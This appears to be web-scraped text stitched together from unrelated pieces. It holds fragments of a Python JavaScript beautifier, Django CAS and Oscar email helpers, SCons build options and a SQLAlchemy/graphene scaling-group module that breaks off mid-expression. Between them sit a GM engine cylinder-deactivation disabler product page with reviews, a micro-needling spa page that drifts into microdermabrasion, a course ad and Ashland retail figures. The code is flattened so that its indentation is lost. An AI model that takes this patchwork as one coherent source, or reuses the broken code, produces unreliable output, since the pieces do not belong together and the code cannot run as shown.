newTokens.append(tokens[i]) else: newTokens.append(tokens[i]) i+=1 tokens = newTokens # now let's simplify the whitespace tokens into single ones newTokens = [] lastToken = False for i in range(len(tokens)): if(lastToken): if(lastToken.index == 0): if(tokens[i].type == TYPE_WHITESPACE): if(tokens[i].index == 1): lastToken = tokens[i] else: newTokens.append(tokens[i]) lastToken = False elif(lastToken.index == 1): if(tokens[i].type == TYPE_WHITESPACE): if(tokens[i].index == 1): if(len(lastToken.string) < 2): lastToken.string += tokens[i].string else: newTokens.append(lastToken) newTokens.append(tokens[i]) lastToken = False elif(tokens[i].type == TYPE_WHITESPACE): lastToken = tokens[i] else: newTokens.append(tokens[i]) if(lastToken): newTokens.append(lastToken) tokens = newTokens # now let's switch curly and newline tokens for i in range(len(tokens)-1): if(tokens[i].type == TYPE_WHITESPACE): if(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 0): if(i < len(tokens)-2): if(tokens[i+2].type == TYPE_WHITESPACE): tokens.remove(tokens[i+2]) if(i == 0 or tokens[i-1].type != TYPE_COMMENT): tmp = tokens[i] tokens[i] = tokens[i+1] tokens[i+1] = tmp elif(tokens[i].type == TYPE_CURLY and tokens[i].index == 0): if(tokens[i+1].type != TYPE_WHITESPACE and not(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1)): tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1)) elif(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1): if(tokens[i].type != TYPE_WHITESPACE and not(tokens[i].type == TYPE_CURLY and tokens[i+1].index == 0)): tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1)) if(i == len(tokens)-2): break # now let's switch curly and newline tokens curlyCount = 0 braceCount = 0 for i in range(len(tokens)-1): if(tokens[i].type == TYPE_CURLY): if(tokens[i].index == 0): curlyCount += 1 else: curlyCount -= 1 elif(tokens[i].type == TYPE_BRACE): if(tokens[i].index == 0): braceCount += 1 else: braceCount -= 1 #elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 0): # if(braceCount <= curlyCount): # tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1)) return tokens def stringify(tokens, extension = 'js'): lines = [] line = [] # loop over all tokens and put them in lines for i in range(len(tokens)): if(tokens[i].type == TYPE_WHITESPACE): if(tokens[i].index == 1): lines.append(line) if(len(tokens[i].string) > 1): lines.append([token('',TYPE_WHITESPACE)]) line = [] continue line.append(tokens[i]) if(len(line)>0): lines.append(line) strings = [] tabs = '' globalCurlyCount = 0 globalBraceCount = 0 globalBracketCount = 0 globalQuoteCount = 0 entryQuote = 0 history = [] for j in range(len(lines)): line = lines[j] curlyCount = 0 braceCount = 0 bracketCount = 0 string = '' # check if we have a single control line without curly prevLine = False if(j > 0): k = j-1 while(k >= 0): if(len(lines[k]) > 0 and (len(lines[k]) > 1 or lines[k][0].type != TYPE_WHITESPACE)): prevLine = lines[k] break k -= 1 for i in range(len(line)): if(line[i].type == TYPE_CURLY): if(line[i].index == 0): globalCurlyCount += 1 curlyCount += 1 else: if(curlyCount == 0): string = string[2:100000] globalCurlyCount -= 1 curlyCount -= 1 if(line[i].type == TYPE_BRACE): if(line[i].index == 0): globalBraceCount += 1 braceCount += 1 else: if(braceCount == 0): string = string[2:100000] globalBraceCount -= 1 braceCount -= 1 if(line[i].type == TYPE_BRACKET): if(line[i].index == 0): globalBracketCount += 1 bracketCount += 1 else: if(bracketCount == 0): string = string[2:100000] globalBracketCount -= 1 bracketCount -= 1 tabCount = curlyCount + braceCount + bracketCount tabBefore = True if(prevLine): if(prevLine[0].type == TYPE_CONTROL and prevLine[0].string != 'case' and prevLine[0].string != 'default'): lastToken = prevLine[len(prevLine)-1] if(lastToken.type != TYPE_CURLY or lastToken.index > 0): string += ' '; elif(prevLine[len(prevLine)-1].type == TYPE_BINOPERATOR and tabCount <= 0): tabBefore = False string += ' '; if(tabCount < 0 and tabBefore): for i in range(abs(tabCount)): tabs = tabs[2:10000] string += tabs if(len(line)>1): firstToken = line[0] lastToken = line[len(line)-1] if(firstToken.index == 1 and (firstToken.type == TYPE_CURLY or firstToken.type == TYPE_BRACE or firstToken.type == TYPE_BRACKET) and lastToken.index == 0 and (lastToken.type == TYPE_CURLY or lastToken.type == TYPE_BRACE or lastToken.type == TYPE_BRACKET)): string = string[2:10000] elif(len(line) == 1 and line[0].type == TYPE_CURLY and line[0].index == 0): string = string[2:10000] if(tabCount < 0 and not tabBefore): for i in range(abs(tabCount)): tabs = tabs[2:10000] if(tabCount > 0): for i in range(tabCount): tabs += ' ' for i in range(0,len(line)): if(line[i].type == TYPE_BRACE or line[i].type == TYPE_CURLY or line[i].type == TYPE_BRACKET): if(line[i].index == 0): history.append(line[i].string) else: if(line[i].type == TYPE_CURLY): if(len(history) > 2 and history[len(history)-1] == 'case'): tabs = tabs[2:10000] string = string[2:10000] history.pop() if(len(history) > 0): history.pop() if(line[i].type == TYPE_COMMENT): string += line[i].string.strip() continue if(line[i].type == TYPE_CURLY): if(line[i].index == 0 and not string.endswith(' ') and not string.endswith('[') and not string.endswith('(')): string += ' '+line[i].string continue if(line[i].type == TYPE_FUNCTION): if(line[i+1].type != TYPE_BRACE and (line[i].string == 'function' or extension == 'kl')): string += line[i].string+' ' continue if(line[i].type == TYPE_BINOPERATOR): if(line[i].string == '-'): if(i==0): string += line[i].string continue if(line[i-1].type != TYPE_IDENTIFIER and line[i-1].index == 0): string += line[i].string continue if(not string.endswith(' ')): if line[i].string == ":" : if(len(history) > 0): if(history[len(history)-1] == '?'): string += ' ' history.pop() elif line[i].string == "?": history.append('?') string += ' ' elif line[i].string == "!": if(not string.endswith('(')): string += ' ' else: string += ' ' string += line[i].string if(i < len(line)-1 and line[i].string != '!'): string += ' ' continue if(line[i].type == TYPE_COMMA and line[i].index == 0 and i < len(line)-1): string += line[i].string+' ' continue if(line[i].type == TYPE_CONTROL): if(line[i].string == 'case' or line[i].string == 'default'): if(len(history)>0 and history[len(history)-1] == 'case'): string = string[2:10000] else: history.append('case') tabs += ' ' if(i < len(line)-1 and (line[i+1].type == TYPE_BRACE or line[i+1].type == TYPE_CONTROL or line[i+1].type == TYPE_COMMENT or line[i+1].type == TYPE_IDENTIFIER)): string += line[i].string+' ' else: string += line[i].string continue if(line[i].type == TYPE_KEYWORD and (line[i].string == "var" or line[i].string == "#include")): string += line[i].string+' ' continue if(line[i].type == TYPE_KEYWORD and line[i].string == "return" and i < len(line)-1 and line[i+1].type != TYPE_SEMICOLON): string += line[i].string+' ' continue if(line[i].type == TYPE_IDENTIFIER and len(string) > 0 and not string.endswith(' ') and not string.endswith('.') and not string.endswith('(') and not string.endswith('[') and not string.endswith('{') and not string.endswith('!')): if(string.endswith('-') and not string[0:len(string)-1].endswith(' ')): string += line[i].string else: string += ' '+line[i].string continue if(line[i].type == TYPE_SEMICOLON and i < len(line)-1 and line[i+1].type != TYPE_WHITESPACE): string += line[i].string + ' ' continue string += line[i].string if(len(string.strip())==0): strings.append('') else: strings.append(string) # now reindent the tabs, based on smallest indent possible counts = [] for string in strings: count = 0 while(string[count*2:count*2+1] == ' '): count += 1 counts.append(count) def reindent(strings,counts,index): if(strings[index] == ''): return count = counts[index] while(counts[index+1] == count or strings[index+1] == ''): index += 1 if(index == len(counts)-1): return if(counts[index+1] > count+1): highIndex = index+1 lowIndex = index+1 # we found a 2 tabbing or higher # now let's check if the next lower one is also my count while(counts[lowIndex] >= counts[highIndex] or strings[lowIndex] == ''): lowIndex += 1 if(lowIndex == len(counts)-1): break if(counts[lowIndex] <= count): # fantastic, we can lower the tabs diff = count - counts[highIndex] + 1 for i in range(highIndex,lowIndex): counts[i] += diff for i in range(len(counts)-1): reindent(strings,counts,i) for i in range(len(counts)): count = 0 while(strings[i][count:count+1] == ' '): count += 1 newCount = counts[i] * 2 strings[i] = strings[i][(count-newCount):100000] return '\n'.join(strings) def parseJSFile(fileName): # get the content content = open(fileName).read() tokens = tokenize(content) string = stringify(tokens) if(not string.endswith('\n')): string += '\n' open(fileName,'w').write(string) def parseHTMLFile(fileName): # get the content lines = open(fileName).read().replace('\t',' ').replace('\r\n','\n').replace('\r','\n').split('\n') prejscontent = [] jscontent = [] postjscontent = [] insideJS = 0 for line in lines: stripped = line.lower().strip() if(insideJS == 0): if(stripped.startswith('<')): stripped = stripped[1:10000].strip() if(stripped.startswith('script') and stripped.find('src')==-1): insideJS = 1 prejscontent.append(line) elif(insideJS == 1): if(stripped.startswith('<')): insideJS = 2 postjscontent.append(line) else: jscontent.append(line) else: postjscontent.append(line) tokens = tokenize('\n'.join(jscontent)) string = stringify(tokens) string = '\n'.join(prejscontent) + '\n' + string + '\n' + '\n'.join(postjscontent) open(fileName,'w').write(string) def main(): if(not sys.argv or len(sys.argv) == 0): raise(Exception("No files specified!")) arguments = [] for arg in sys.argv: arguments.append(arg) if(len(arguments) <= 1): print("Run the tool with all paths to beautify!") return files = [] for arg in arguments: if(arg.find('*') != -1): matched = glob.glob(arg) for match in matched: arguments.append(match) continue for ft in fileTypes: if(arg.lower().endswith(ft)): if(os.path.exists(arg)): files.append(arg) break else: raise(Exception("The file '"+arg+' does not exist!')) # parse each file for i in range(len(files)): extension = files[i].lower().rpartition('.')[2] if(extension == 'js' or extension == 'kl'): parseJSFile(files[i]) elif(extension == 'html' or extension == 'htm'): parseHTMLFile(files[i]) else: raise(Exception("Unsupported file format '"+extension+"'!")) print(str(i+1)+" of "+str(len(files))+" : beautified '"+files[i]+"' successfully.") if __name__ == '__main__': main()
Do you also find yourself in an ever-changing business environment? In the midst of complex decision-making processes? And with expectations of constant peak performance? If so, this course is for you!
from .cas import CASClient from django.conf import settings as django_settings from django.contrib.auth import REDIRECT_FIELD_NAME from django.utils.six.moves import urllib_parse def get_protocol(request): """Returns 'http' or 'https' for the request protocol""" if request.is_secure(): return 'https' return 'http' def get_redirect_url(request): """Redirects to referring page, or CAS_REDIRECT_URL if no referrer is set. """ next_ = request.GET.get(REDIRECT_FIELD_NAME) if not next_: if django_settings.CAS_IGNORE_REFERER: next_ = django_settings.CAS_REDIRECT_URL else: next_ = request.META.get('HTTP_REFERER', django_settings.CAS_REDIRECT_URL) prefix = urllib_parse.urlunparse( (get_protocol(request), request.get_host(), '', '', '', ''), ) if next_.startswith(prefix): next_ = next_[len(prefix):] return next_ def get_service_url(request, redirect_to=None): """Generates application django service URL for CAS""" protocol = get_protocol(request) host = request.get_host() service = urllib_parse.urlunparse( (protocol, host, request.path, '', '', ''), ) if '?' in service: service += '&' else: service += '?' service += urllib_parse.urlencode({ REDIRECT_FIELD_NAME: redirect_to or get_redirect_url(request) }) return service def get_cas_client(service_url=None): """ initializes the CASClient according to the CAS_* settigs """ return CASClient( service_url=service_url, version=django_settings.CAS_VERSION, server_url=django_settings.CAS_SERVER_URL, extra_login_params=django_settings.CAS_EXTRA_LOGIN_PARAMS, renew=django_settings.CAS_RENEW, username_attribute=django_settings.CAS_USERNAME_ATTRIBUTE, proxy_callback=django_settings.CAS_PROXY_CALLBACK )
We can help! Our family of products can address your needs. A family of unique patented solutions! DYNAMIC FUEL MANAGEMENT (DFM) DISABLER All the Power, All the time! Keep your vehicle in all cylinder mode! For GM V8 engines with DFM. *IN TESTING* Check back in coming weeks for the release of this version! I have a flowmaster super 40 with dual outlets on my Silverado. The AFM Disabler has worked perfectly from day one. I am so happy not to deal with v4 anymore. My Camaro SS is like a brand new car now. No more shuddering vibration and annoying 4 banger exhaust noise. Thank you Range for my full time V8. Right on! Does what it is supposed to do. I still have a warranty and it’s nice to know I can just unplug it before taking it in. Bought this to shut down the AFM and it does just that. It got rid of the hesitation of switching between 8cyl and 4cyl mode. I recommend this to everyone I know that has a Suburban with AFM. Good communication and fast turn around. Thanks! I believe that Caitlin went above and beyond to help me with my current situation. After a few issues in the past she was very instrumental in resolving my situation. Completely satisfied! Awesome product! Does exactly what it says it should and is simple as it gets. Plug it in and go! Thanks! It took over 8,000 hours and more than 100,000 miles on the road to develop technology that customizes your vehicle to suit your driving needs.
import logging from django.conf import settings from django.contrib.auth.tokens import default_token_generator from django.core.mail import EmailMessage, EmailMultiAlternatives from django.core.urlresolvers import reverse from django.utils.encoding import force_bytes from django.utils.http import urlsafe_base64_encode from oscar.core.loading import get_model CommunicationEvent = get_model('order', 'CommunicationEvent') Email = get_model('customer', 'Email') class Dispatcher(object): def __init__(self, logger=None): if not logger: logger = logging.getLogger(__name__) self.logger = logger # Public API methods def dispatch_direct_messages(self, recipient, messages): """ Dispatch one-off messages to explicitly specified recipient(s). """ if messages['subject'] and messages['body']: self.send_email_messages(recipient, messages) def dispatch_order_messages(self, order, messages, event_type=None, **kwargs): """ Dispatch order-related messages to the customer """ if order.is_anonymous: if 'email_address' in kwargs: self.send_email_messages(kwargs['email_address'], messages) elif order.guest_email: self.send_email_messages(order.guest_email, messages) else: return else: self.dispatch_user_messages(order.user, messages) # Create order communications event for audit if event_type is not None: CommunicationEvent._default_manager.create( order=order, event_type=event_type) def dispatch_user_messages(self, user, messages): """ Send messages to a site user """ if messages['subject'] and (messages['body'] or messages['html']): self.send_user_email_messages(user, messages) if messages['sms']: self.send_text_message(user, messages['sms']) # Internal def send_user_email_messages(self, user, messages): """ Sends message to the registered user / customer and collects data in database """ if not user.email: self.logger.warning("Unable to send email messages as user #%d has" " no email address", user.id) return email = self.send_email_messages(user.email, messages) # Is user is signed in, record the event for audit if email and user.is_authenticated(): Email._default_manager.create(user=user, subject=email.subject, body_text=email.body, body_html=messages['html']) def send_email_messages(self, recipient, messages): """ Plain email sending to the specified recipient """ if hasattr(settings, 'OSCAR_FROM_EMAIL'): from_email = settings.OSCAR_FROM_EMAIL else: from_email = None # Determine whether we are sending a HTML version too if messages['html']: email = EmailMultiAlternatives(messages['subject'], messages['body'], from_email=from_email, to=[recipient]) email.attach_alternative(messages['html'], "text/html") else: email = EmailMessage(messages['subject'], messages['body'], from_email=from_email, to=[recipient]) self.logger.info("Sending email to %s" % recipient) email.send() return email def send_text_message(self, user, event_type): raise NotImplementedError def get_password_reset_url(user, token_generator=default_token_generator): """ Generate a password-reset URL for a given user """ kwargs = { 'token': token_generator.make_token(user), 'uidb64': urlsafe_base64_encode(force_bytes(user.id)), } return reverse('password-reset-confirm', kwargs=kwargs) def normalise_email(email): """ The local part of an email address is case-sensitive, the domain part isn't. This function lowercases the host and should be used in all email handling. """ clean_email = email.strip() if '@' in clean_email: local, host = clean_email.split('@') return local + '@' + host.lower() return clean_email
Micro-Needling (also known as Collagen Induction Therapy) is an innovative skin rejuvenation treatment that can improve the overall appearance of the skin with minimal down-time. The micro-needling process involves the creation of microscopic channels through the surface of the skin, which leads to formation of new tissue and releases the skin’s natural growth factors which promotes scar and hyperpigmentation repair and healing. This can be enhanced by application of platelet-rich plasma (PRP), growth factor gels, kojic acid, and hyaluronic acid based skin rejuvenation treatments. By creating minor skin injury during the procedure, the skin’s natural healing process initiates the production of new collagen and elastin fibers that thicken the skin and reduce the appearance of wrinkles, acne scarring, sun damage, and stretch marks. WHAT CONDITIONS CAN MICRO-NEEDLING IMPROVE? As we age, our skin gets dry and dull and signs of sun damage commonly appear over time. Micodermabrasion reverses the signs of aging to deliver supple, glowing skin in just one treatment. During the treatment, a top layer of the skin is exfoliated and unwanted dead cells are removed leaving the skin supple and glowing. Microdermabrasion is a safe, well-tested procedure that can be used in combination with Photofacial, Chemical Peels and Micro-needling. It is a resurfacing procedure that gently exfoliates the top layer of skin and removes the unwanted dead cells by vacuuming them away. Removing this top layer of dead skin, the skin looks and feels smoother. Microdermabrasion promotes better circulation in the face and significantly enhances collagen production, responsible for cell and skin renewal.
####################################################################### # Common SCons code import os import os.path import re import subprocess import sys import platform as _platform import SCons.Script.SConscript ####################################################################### # Defaults host_platform = _platform.system().lower() if host_platform.startswith('cygwin'): host_platform = 'cygwin' # Search sys.argv[] for a "platform=foo" argument since we don't have # an 'env' variable at this point. if 'platform' in SCons.Script.ARGUMENTS: target_platform = SCons.Script.ARGUMENTS['platform'] else: target_platform = host_platform _machine_map = { 'x86': 'x86', 'i386': 'x86', 'i486': 'x86', 'i586': 'x86', 'i686': 'x86', 'BePC': 'x86', 'Intel': 'x86', 'ppc' : 'ppc', 'BeBox': 'ppc', 'BeMac': 'ppc', 'AMD64': 'x86_64', 'x86_64': 'x86_64', 'sparc': 'sparc', 'sun4u': 'sparc', } # find host_machine value if 'PROCESSOR_ARCHITECTURE' in os.environ: host_machine = os.environ['PROCESSOR_ARCHITECTURE'] else: host_machine = _platform.machine() host_machine = _machine_map.get(host_machine, 'generic') default_machine = host_machine default_toolchain = 'default' if target_platform == 'windows' and host_platform != 'windows': default_machine = 'x86' default_toolchain = 'crossmingw' # find default_llvm value if 'LLVM' in os.environ: default_llvm = 'yes' else: default_llvm = 'no' try: if target_platform != 'windows' and \ subprocess.call(['llvm-config', '--version'], stdout=subprocess.PIPE) == 0: default_llvm = 'yes' except: pass ####################################################################### # Common options def AddOptions(opts): try: from SCons.Variables.BoolVariable import BoolVariable as BoolOption except ImportError: from SCons.Options.BoolOption import BoolOption try: from SCons.Variables.EnumVariable import EnumVariable as EnumOption except ImportError: from SCons.Options.EnumOption import EnumOption opts.Add(EnumOption('build', 'build type', 'debug', allowed_values=('debug', 'checked', 'profile', 'release'))) opts.Add(BoolOption('verbose', 'verbose output', 'no')) opts.Add(EnumOption('machine', 'use machine-specific assembly code', default_machine, allowed_values=('generic', 'ppc', 'x86', 'x86_64'))) opts.Add(EnumOption('platform', 'target platform', host_platform, allowed_values=('cygwin', 'darwin', 'freebsd', 'haiku', 'linux', 'sunos', 'windows'))) opts.Add(BoolOption('embedded', 'embedded build', 'no')) opts.Add('toolchain', 'compiler toolchain', default_toolchain) opts.Add(BoolOption('gles', 'EXPERIMENTAL: enable OpenGL ES support', 'no')) opts.Add(BoolOption('llvm', 'use LLVM', default_llvm)) opts.Add(BoolOption('openmp', 'EXPERIMENTAL: compile with openmp (swrast)', 'no')) opts.Add(BoolOption('debug', 'DEPRECATED: debug build', 'yes')) opts.Add(BoolOption('profile', 'DEPRECATED: profile build', 'no')) opts.Add(BoolOption('quiet', 'DEPRECATED: profile build', 'yes')) opts.Add(BoolOption('texture_float', 'enable floating-point textures and renderbuffers', 'no')) if host_platform == 'windows': opts.Add(EnumOption('MSVS_VERSION', 'MS Visual C++ version', None, allowed_values=('7.1', '8.0', '9.0')))
The retail industry in Ashland represents 1,423 employees and 157 firms. The average annual payroll, from 2013 of $26,515 is 97% of the state average in retail payroll. This industry is expansive and diverse representing retail businesses in clothing, auto and health, just to name a few. Ashland retailers are supported by a community of residents that are dedicated to shopping local and a large visitor base hoping to return home with a treat from Ashland.
from __future__ import annotations from typing import ( Any, Dict, Sequence, Set, TYPE_CHECKING, Union, ) import uuid import sqlalchemy as sa from sqlalchemy.dialects import postgresql as pgsql from sqlalchemy.engine.row import Row from sqlalchemy.ext.asyncio import AsyncConnection as SAConnection import graphene from graphene.types.datetime import DateTime as GQLDateTime from .base import ( metadata, simple_db_mutate, simple_db_mutate_returning_item, set_if_set, batch_result, ) from .group import resolve_group_name_or_id from .user import UserRole if TYPE_CHECKING: from .gql import GraphQueryContext __all__: Sequence[str] = ( # table defs 'scaling_groups', 'sgroups_for_domains', 'sgroups_for_groups', 'sgroups_for_keypairs', # functions 'query_allowed_sgroups', 'ScalingGroup', 'CreateScalingGroup', 'ModifyScalingGroup', 'DeleteScalingGroup', 'AssociateScalingGroupWithDomain', 'AssociateScalingGroupWithUserGroup', 'AssociateScalingGroupWithKeyPair', 'DisassociateScalingGroupWithDomain', 'DisassociateScalingGroupWithUserGroup', 'DisassociateScalingGroupWithKeyPair', ) scaling_groups = sa.Table( 'scaling_groups', metadata, sa.Column('name', sa.String(length=64), primary_key=True), sa.Column('description', sa.String(length=512)), sa.Column('is_active', sa.Boolean, index=True, default=True), sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now()), sa.Column('driver', sa.String(length=64), nullable=False), sa.Column('driver_opts', pgsql.JSONB(), nullable=False, default={}), sa.Column('scheduler', sa.String(length=64), nullable=False), sa.Column('scheduler_opts', pgsql.JSONB(), nullable=False, default={}), ) # When scheduling, we take the union of allowed scaling groups for # each domain, group, and keypair. sgroups_for_domains = sa.Table( 'sgroups_for_domains', metadata, sa.Column('scaling_group', sa.ForeignKey('scaling_groups.name', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.Column('domain', sa.ForeignKey('domains.name', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.UniqueConstraint('scaling_group', 'domain', name='uq_sgroup_domain'), ) sgroups_for_groups = sa.Table( 'sgroups_for_groups', metadata, sa.Column('scaling_group', sa.ForeignKey('scaling_groups.name', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.Column('group', sa.ForeignKey('groups.id', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.UniqueConstraint('scaling_group', 'group', name='uq_sgroup_ugroup'), ) sgroups_for_keypairs = sa.Table( 'sgroups_for_keypairs', metadata, sa.Column('scaling_group', sa.ForeignKey('scaling_groups.name', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.Column('access_key', sa.ForeignKey('keypairs.access_key', onupdate='CASCADE', ondelete='CASCADE'), index=True, nullable=False), sa.UniqueConstraint('scaling_group', 'access_key', name='uq_sgroup_akey'), ) async def query_allowed_sgroups( db_conn: SAConnection, domain_name: str, group: Union[uuid.UUID, str], access_key: str, ) -> Sequence[Row]: query = ( sa.select([sgroups_for_domains]) .where(sgroups_for_domains.c.domain == domain_name) ) result = await db_conn.execute(query) from_domain = {row['scaling_group'] for row in result} group_id = await resolve_group_name_or_id(db_conn, domain_name, group) from_group: Set[str] if group_id is None: from_group = set() # empty else: query = ( sa.select([sgroups_for_groups]) .where( (sgroups_for_groups.c.group == group_id) ) ) result = await db_conn.execute(query) from_group = {row['scaling_group'] for row in result} query = (sa.select([sgroups_for_keypairs]) .where(sgroups_for_keypairs.c.access_key == access_key)) result = await db_conn.execute(query) from_keypair = {row['scaling_group'] for row in result} sgroups = from_domain | from_group | from_keypair query = (sa.select([scaling_groups]) .where( (scaling_groups.c.name.in_(sgroups)) & (scaling_groups.c.is_active) )) result = await db_conn.execute(query) return [row for row in result] class ScalingGroup(graphene.ObjectType): name = graphene.String() description = graphene.String() is_active = graphene.Boolean() created_at = GQLDateTime() driver = graphene.String() driver_opts = graphene.JSONString() scheduler = graphene.String() scheduler_opts = graphene.JSONString() @classmethod def from_row( cls, ctx: GraphQueryContext, row: Row | None, ) -> ScalingGroup | None: if row is None: return None return cls( name=row['name'], description=row['description'], is_active=row['is_active'], created_at=row['created_at'], driver=row['driver'], driver_opts=row['driver_opts'], scheduler=row['scheduler'], scheduler_opts=row['scheduler_opts'], ) @classmethod async def load_all( cls, ctx: GraphQueryContext, *, is_active: bool = None, ) -> Sequence[ScalingGroup]: query = sa.select([scaling_groups]).select_from(scaling_groups) if is_active is not None: query = query.where(scaling_groups.c.is_active == is_active) async with ctx.db.begin_readonly() as conn: return [ obj async for row in (await conn.stream(query)) if (obj := cls.from_row(ctx, row)) is not None ] @classmethod async def load_by_domain( cls, ctx: GraphQueryContext, domain: str, *, is_active: bool = None, ) -> Sequence[ScalingGroup]: j = sa.join( scaling_groups, sgroups_for_domains, scaling_groups.c.name == sgroups_for_domains.c.scaling_group) query = ( sa.select([scaling_groups]) .select_from(j) .where(sgroups_for_domains.c.domain == domain) ) if is_active is not None: query = query.where(scaling_groups.c.is_active == is_active) async with ctx.db.begin_readonly() as conn: return [ obj async for row in (await conn.stream(query)) if (obj := cls.from_row(ctx, row)) is not None ] @classmethod async def load_by_group( cls, ctx: GraphQueryContext, group: uuid.UUID, *, is_active: bool = None, ) -> Sequence[ScalingGroup]: j = sa.join( scaling_groups, sgroups_for_groups, scaling_groups.c.name == sgroups_for_groups.c.scaling_group ) query = ( sa.select([scaling_groups]) .select_from(j) .where(sgroups_for_groups.c.group == group) ) if is_active is not None: query = query.where(scaling_groups.c.is_active == is_active) async with ctx.db.begin_readonly() as conn: return [ obj async for row in (await conn.stream(query)) if (obj := cls.from_row(ctx, row)) is not None ] @classmethod async def load_by_keypair( cls, ctx: GraphQueryContext, access_key: str, *, is_active: bool = None, ) -> Sequence[ScalingGroup]: j = sa.join( scaling_groups, sgroups_for_keypairs, scaling_groups.c.name == sgroups_for_keypairs.c.scaling_group) query = ( sa.select([scaling_groups]) .select_from(j) .where(sgroups_for_keypairs.c.access_key == access_key) ) if is_active is not None: query = query.where(scaling_groups.c.is_active == is_active) async with ctx.db.begin_readonly() as conn: return [ obj async for row in (await conn.stream(query)) if (obj := cls.from_row(ctx, row)) is not None ] @classmethod async def batch_load_by_name( cls, ctx: GraphQueryContext, names: Sequence[str], ) -> Sequence[ScalingGroup | None]: query = ( sa.select([scaling_groups]) .select_from(scaling_groups) .where(scaling_groups.c.name.in_(names)) ) async with ctx.db.begin_readonly() as conn: return await batch_result( ctx, conn, query, cls, names, lambda row: row['name'], ) class CreateScalingGroupInput(graphene.InputObjectType): description = graphene.String(required=False, default='') is_active = graphene.Boolean(required=False, default=True) driver = graphene.String(required=True) driver_opts = graphene.JSONString(required=False, default={}) scheduler = graphene.String(required=True) scheduler_opts = graphene.JSONString(required=False, default={}) class ModifyScalingGroupInput(graphene.InputObjectType): description = graphene.String(required=False) is_active = graphene.Boolean(required=False) driver = graphene.String(required=False) driver_opts = graphene.JSONString(required=False) scheduler = graphene.String(required=False) scheduler_opts = graphene.JSONString(required=False) class CreateScalingGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: name = graphene.String(required=True) props = CreateScalingGroupInput(required=True) ok = graphene.Boolean() msg = graphene.String() scaling_group = graphene.Field(lambda: ScalingGroup, required=False) @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, name: str, props: CreateScalingGroupInput, ) -> CreateScalingGroup: data = { 'name': name, 'description': props.description, 'is_active': bool(props.is_active), 'driver': props.driver, 'driver_opts': props.driver_opts, 'scheduler': props.scheduler, 'scheduler_opts': props.scheduler_opts, } insert_query = ( sa.insert(scaling_groups).values(data) ) return await simple_db_mutate_returning_item( cls, info.context, insert_query, item_cls=ScalingGroup ) class ModifyScalingGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: name = graphene.String(required=True) props = ModifyScalingGroupInput(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, name: str, props: ModifyScalingGroupInput, ) -> ModifyScalingGroup: data: Dict[str, Any] = {} set_if_set(props, data, 'description') set_if_set(props, data, 'is_active') set_if_set(props, data, 'driver') set_if_set(props, data, 'driver_opts') set_if_set(props, data, 'scheduler') set_if_set(props, data, 'scheduler_opts') update_query = ( sa.update(scaling_groups) .values(data) .where(scaling_groups.c.name == name) ) return await simple_db_mutate(cls, info.context, update_query) class DeleteScalingGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: name = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, name: str, ) -> DeleteScalingGroup: delete_query = ( sa.delete(scaling_groups) .where(scaling_groups.c.name == name) ) return await simple_db_mutate(cls, info.context, delete_query) class AssociateScalingGroupWithDomain(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) domain = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, domain: str, ) -> AssociateScalingGroupWithDomain: insert_query = ( sa.insert(sgroups_for_domains) .values({ 'scaling_group': scaling_group, 'domain': domain, }) ) return await simple_db_mutate(cls, info.context, insert_query) class DisassociateScalingGroupWithDomain(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) domain = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, domain: str, ) -> DisassociateScalingGroupWithDomain: delete_query = ( sa.delete(sgroups_for_domains) .where( (sgroups_for_domains.c.scaling_group == scaling_group) & (sgroups_for_domains.c.domain == domain) ) ) return await simple_db_mutate(cls, info.context, delete_query) class DisassociateAllScalingGroupsWithDomain(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: domain = graphene.String(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, domain: str, ) -> DisassociateAllScalingGroupsWithDomain: delete_query = ( sa.delete(sgroups_for_domains) .where(sgroups_for_domains.c.domain == domain) ) return await simple_db_mutate(cls, info.context, delete_query) class AssociateScalingGroupWithUserGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) user_group = graphene.UUID(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, user_group: uuid.UUID, ) -> AssociateScalingGroupWithUserGroup: insert_query = ( sa.insert(sgroups_for_groups) .values({ 'scaling_group': scaling_group, 'group': user_group, }) ) return await simple_db_mutate(cls, info.context, insert_query) class DisassociateScalingGroupWithUserGroup(graphene.Mutation): allowed_roles = (UserRole.SUPERADMIN,) class Arguments: scaling_group = graphene.String(required=True) user_group = graphene.UUID(required=True) ok = graphene.Boolean() msg = graphene.String() @classmethod async def mutate( cls, root, info: graphene.ResolveInfo, scaling_group: str, user_group: uuid.UUID, ) -> DisassociateScalingGroupWithUserGroup: delete_query = ( sa.delete(sgroups_for_groups) .where( (sgroups_for_groups.c.scaling_group == scaling_group) & 